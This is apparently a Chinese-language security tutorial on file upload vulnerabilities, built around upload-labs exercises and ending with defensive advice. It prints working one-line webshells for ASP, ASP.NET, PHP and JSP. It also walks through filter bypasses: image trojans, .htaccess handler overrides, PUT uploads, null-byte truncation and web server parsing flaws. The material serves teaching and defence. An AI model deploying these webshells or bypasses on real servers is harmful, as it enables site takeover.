文件上传漏洞
文件上传是Web应用到必备功能之一,比如上传头像显示个性化,上传附件共享文件、上传脚本更新网站等。如果服务器配置不当或者没有进行足够的过滤,Web用户就可以上传任意文件,包括恶意脚本文件、exe程序等,这就造成了文件上传漏洞。
- 漏洞成因
文件上传漏洞的成因,一方面服务器配置不当会导致任意文件上传;另一方面,Web应用开放了文件上传功能,并且对上传的文件没有进行足够的限制;再者就是,程序开发部署时候,没有考虑到系统特性和验证和过滤不严格而导致限制被绕过,上传任意文件。 - 漏洞危害
上传漏洞最直接的威胁就是上传任意文件,包括恶意脚本、程序等。如果Web服务器所保存上传文件的可写目录具有执行权限,那么就可以直接上传后门文件,导致网站沦陷。如果攻击者通过其他漏洞进行提权操作,拿到系统管理权限,那么直接导致服务器沦陷。同服务器下的其他网站无一幸免,均会被攻击者控制。
通过上传漏洞获得的网站后门,就是WebShell。 - WebShell
在计算机科学中,Shell俗称壳(用来区别于“核”),是指“为使用者提供操作界面”的软件(命令解释器)。类似于windows系统给的cmd.exe或者linux下bash等,虽然这些系统上的命令解释器不止一种。
WebShell是一个网站的后门,也是一个命令解释器,不过是以Web方式(HTTP协议)通信(传递命令消息),继承了Web用户的权限。WebShell本质上是在服务器端可运行的脚本文件,后缀名为.php/.asp/.aspx/.jsp等,也就是说WebShell接收来自于Web用户的命令,然后在服务器端执行。 - 大马
WebShell也可以是大马,也是网站木马。有一类WebShell之所以叫大马,是因为与小马(一句话木马)区分开,并且大码比较大,但是功能比较丰富。同样,大马有很多种脚本格式,其功能基本相同。每个团队都有自己的定制大马。以下是一个简单的例子。输入密码,密码一般直接写在木马文件中。
在大马中我们可以进行文件管理,执行系统命令与一些其他定制功能。 - 小马
小马就是一句话木马,因为其代码量比较小,就是一句简单的代码。以下是各个脚本的一句话。
#ASP:
<%eval request("cmd")%>
#ASP.NET
<%@ Page Language="Jscript"%>"
<%eval(Request.Item["cmd","unsafe"]);%>
#PHP
<?php @eval($_REQUEST["cmd"]);?>
#JSP
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
一句话木马短小精悍,功能强大,但是需要配合中国菜刀或者中国蚁剑客户端使用,中国菜刀是一句话木马的管理器,也是命令操作接口。中国菜刀在连接一句话木马的时候需要填写密码(实际上就是变量名)。例如,我们上传一个php的一句话木马,密码就是[cmd]。
中国菜刀与一句话木马配合实现了三大基本功能,如下:
- 文件管理
- 虚拟终端
- 数据库管理
- GetShell
GetShell顾名思义就是获取Web的过程和结果。当然任意文件上传是GetShell的主要方式,但并不是唯一途径。
文件上传漏洞利用的条件
- 一定的条件
Web服务器要开启文件上传功能,并且上传api(接口)对外“开放”(Web用户可以访问);
Web用户对目标目录具有可写权限,甚至具有执行权限,一般情况下,Web目录都有执行权限。
要想完美利用文件上传漏洞就,需要上传的文件可以执行,也就是Web容器可以解析我们上传的脚本,无论脚本以什么样的形式存在。
无视以上条件的情况就是服务器配置不当,开启了PUT方法。
防御、绕过、利用
文件上传的防御、文件上传的防御绕过还有利用,总是分不开的。为什么这么防?为什么这么攻击(防御绕过)?总是相互纠缠在一起的两个问题,攻防交替。所以,下文也是以这种方式讨论文件上传的问题。
- 黑白名单策略
黑白名单是最常用的安全策略之一。在计算机安全中,黑白名单类似于一个列表,列表中写了一些条件或规则,如果“客体”在黑名单中,一律“禁止”,如果“客体”在白名单中一律“允许”。类似于手机号码的黑白名单。
举例:
1、Chrome浏览器中的黑白名单策略
政策 说明
URLBlacklist:
禁止用户访问您已阻止的网址。不过,用户可以访问黑名单之外的所有网址。不设置此政策:用户将可以自由访问所有网址。
URLWhitelist:
将此政策与URLBlacklist政策搭配使用,可将特定网址设为黑名单的例外网址并允许用户访问;白名单优先级高于黑名单。您至少要在黑名单中添加一个条目,才能正常使用此策略;不设置此策略:网址黑名单将没有例外网址。
2、华为收集安装软件黑白名单策略
模式 说明
白名单模式,检查只能安装的软件:
只允许终端主机安装软件白名单中的软件,安装其他软件则属于违规行为;
对于白名单中的软件,该软件属于必须安装类软件,而终端主机未安装该软件,则属于违规行为;
对于白名单中的软件,该软件不属于必须安装类软件,而终端主机未安装该软件,则不属于违规行为。
白名单+黑名单模式,检查必须安装的软件和禁止安装的软件:
如果终端主机未安装白名单中的任意一款软件,则属于违规行为;
如果终端主机已经安装黑名单中的任意一款软件,则属于违规行为;
如果终端主机已经安装白名单中所有软件,并且没有安装黑名单中的任意一款软件,则不属于违规行为。
PUT方法上传文件 (心跳检测)
HTTP请求方法之一,允许向服务器直接写入文件。
1、Apache如何开启PUT方法
@ 测试Apache是否开启了put方法
telnet ip 80
OPTIONS / HTTP/1.1
HOST:ip
@ Apache开启put方法操作
Apache如何查看与设置PUT请求+利用PUT方法上传文件
httpd.conf 文件
开启模块
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
启用模块
<Directory />
Options + Indexes + FollowSymLinks + ExecCGI
AllowOverride All
Order allow,deny
Require all granted
DAV On
<Directory />
开启文件锁
DavKockDB c:\phpstudy\www\DavLock
上传文件
PUT /info.php HTTP/1.1
Host :ip
Content-Length:18
<?php phpinfo();?>
两类验证方法
1、前端限制与绕过
有些Web应用的文件上传功能,仅在前端用JS脚本做了检测,如检测文件后缀名等。upload-labs第一关,以下是经典的代码:
<script type="text/javascript">
function checkFile(){
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == ""){
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexoOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name)==-1){
var errMsg = "该文件不允许上传,请上传"+allow_ext+"类型文件,当前文件类型为:"+ext_name;
alert(errMsg);
return false;
}
}
</script>
此段JS代码采用白名单策略,检测文件后缀名。配合表单事件使用。
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
<p>请选择要上传的图片:<p>
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="上传"/>
</form>
前端JS脚本检测的安全防御是十分薄弱的。可以非常轻松的绕过。
方法1:因为JS脚本的运行环境是浏览器,我们可以修改JS代码,甚至删除表单事件。
方法2:使恶意文件后缀名符合白名单策略,用Burp挂代理抓包,然后修改文件后缀名即可。
2、服务器端验证
对于文件上传,只从Web前端进行检测显然防护不足,那么服务器端检测就特别重要了。一般服务器端检测,采用黑白名单策略,检测如下内容。
- 服务器端检测-MIME类型
MIME(Multipurpose Internet Mail Extensions)是描述消息内容类型的因特网标准。MIME消息能包含文本、图像、音频、视频以及其他应用程序专用的数据。常见的MIME类型如下
文件扩展名 Mime-Type
.js application/x-javascript
.html text/html
.jpg image/jpeg
.png image/png
.pdf application/pdf
在HTTP协议中,使用Content-Type字段表示文件的MIME类型,当我们上传文件的时候,抓到HTTP数据包。在服务器端会检测Content-Type类型,upload-labs第二关,经典代码如下:
if(isset($_POST['submit'])){
if(file_exists($UPLOAD_ADDR)){
if(($_FILES['upload_file']['type']=='image/jpeg')||($_FILES['upload_file']['type']=='image/png')||($_FILES['upload_file']['type']=='image/gif')){
if(move_uploaded_file($_FILES['upload_file']['tmp_name'],$UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])){
$img_path=$UPLOAD_ADDR . $_FILES['upload_file']['name'];
$is_upload=true;}
}else{
$msg='文件类型不正确,请重新上传!';
}
}else{
$msg=$UPLOAD_ADDR.'文件夹不存在,请手工创建!';
}
由于服务器在检测Content-Type类型的时候,取得的变量来自于用户,所以可以用Burp抓包,修改这个字段,使其合法,即可绕过限制上传任意文件。
- 访问上传的文件
服务器端检测–文件内容
除了检测上传文件的Content-Type类型,为了保持安全性,服务器端还会检测文件内容。PHP中有一个函数getimagesize(),这个函数本意是检查图片大小,但是在检查之前,该函数会判断目标文件是否是一张图片。因此,可以用该函数来检测文件的内容。upload-load14关。
function isImage($filename){
$types='.jpeh|.png|.gif';
if(file_exists($filename)){
$info=getimagesize($filename);
$ext=image_type_toextension($info[2]);
if(strupos($types,$ext)){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
对于文件内容检测,可以通过制作上传图片木马绕过
图片木马制作(将恶意脚本写入图片中)
1、GIF89a
2、文件合并
命令行方法,准备一个图片和木马文件通过以下命令将两个文件合二为一。
[copy smile.jpg/b+info.php/a smileInfo.jpg]
可能受到图片源码影响,这时候换一张图片,或者使用别的方法
利用十六进制编辑器
所有jpg图片的文件头部是相同的,png和gif也是一样的。(文件幻数)
gif:47 49 46 38 39 61 F1 00 2C 01 F7 00 00 64 32 33
jpg:FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2C
png89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52
服务器端检测–后缀名
服务器端还会检测文件后缀名
服务器端在检测文件名的时候,依然会采用黑白名单策略。黑名单策略,不允许上传php|asp|aspx|jsp…等可执行脚本的文件;白名单策略,只允许上传jpg|gif|png|doc|rar…等格式的文件。
- @黑名单
代码中$deny_ext数据就是一个黑名单,数组元素就是不允许上传的类型。
对于黑名单,我们可以寻找其他可允许上传的类型来绕过限制。
可以执行脚本后缀名
.php .php2 .php3 .php5 .phtml
.asp .aspx .ascx .ashx .asa .cer
.jsp .jspx - @白名单
对于后缀名白名单策略,我们只能上传在白名单内的文件后缀名。
截断
00截断
00截断就是Null(空)字符(c语言),URL中表现为%00,00截断会导致文件上传路径截断。
以upload-labs第十一关为例子说明这个问题。
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10,99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
}
else{
$msg = '上传失败!';
}
}
else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
.htaccess攻击
.htaccess是Apache服务器的分布式配置文件,该配置文件会覆盖Apache服务器的全局配置,作用域是当前目录及其子目录。
如果一个Web应用允许上传.htaccess文件,那就意味着攻击者可以更改Apache的配置,这是十分危险的。.htaccess攻击想象空间非常大。
首先看Apache的配置文件,允许.htaccess文件覆盖掉Apache的配置。
# .htaccess文件 (easy).
<FilesMatch "ajest">
SetHandler application/x-httpd-php
</FilesMatch>
- 将.png文件当作PHP文件解析
将一些代码写入文件,并保存成.htaccess名字,放到测试目录下
AddTyoe application/x-httpd-php.png
在同一目录下创建一个文件[info.png],文件内容如下
#info.png
<?php
phpinfo();
?>
当我们访问该文件时,[info.png]内的PHP代码将会被执行。
- 文件名中包含php关键字
当文件名[info.php.png]中包含关键字[.php],并且.htaccess文件内容如下,info.php.png中的代码会被执行。
AddHandler php5-script php - 匹配文件名
以下配置是匹配文件名[ajest],找到该文件,并执行其中的PHP代码
<FilesMatch "ajest">
SetHandler application/x-httpd-php
</FilesMatch>
- upload-labs 第四关
先上传[.htaccess]文件
再上传[ajest]
Web容器解析漏洞
Web容器解析漏洞,就是Web容器在解析脚本出现的“bug”
- Apache解析漏洞(解析顺序从后向前-古老)
info.php.xxx.xx.x - IIS6.0解析漏洞
1、asp;.jpg
time.asp;.jpg
2、1.asp/time.jpg - PHP CGI解析漏洞
1、需要IIS7.0/7.5
IIS7.0/7.5+PHP环境
让IIS7.0/7.5支持PHP环境
http://localhost:8000/info.png/1.php
2、Nginx解析漏洞
/info.png/1.php - Nginx空字节漏洞
- Nginx文件名逻辑漏洞(CVE-2013-4745)
常见编辑器上传
编辑器就是网站后台编辑网页的在线编辑器,会自动集成文件上传功能,这些编辑器的某些版本也存在文件上传漏洞。
- ewebeditor
- fckeditor
常见CMS上传
dedeCMS、PHPcms
南方数据管理系统
注入点
asp|access|.MDB|下载
利用数据库备份进行文件上传(getshell)
metinfov5.0.4文件上传
文件上传漏洞的防御
关于文件上传的防御,防住危险的脚本类型是最基本的防御,最理想的是能够过滤掉图片码中的恶意代码。如果一个Web应用能够上传图片木马,那么我们认为这个Web应用是不安全的。文件上传漏洞的防御主要从以下几个方面考虑。
- 代码角度
采用白名单策略。严格限制上传文件的后缀名。
进行二次渲染,过滤掉图片码中的恶意代码。
上传文件重命名,尽量少的从客户端获取信息。
避免文件包含漏洞。
严格处理文件路径,防御00截断漏洞,避开空格、点、::$DATA等windows特性。 - 服务器角度
及时更新Web容器,防止解析漏洞产生。
可写目录不给执行权限。
750
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
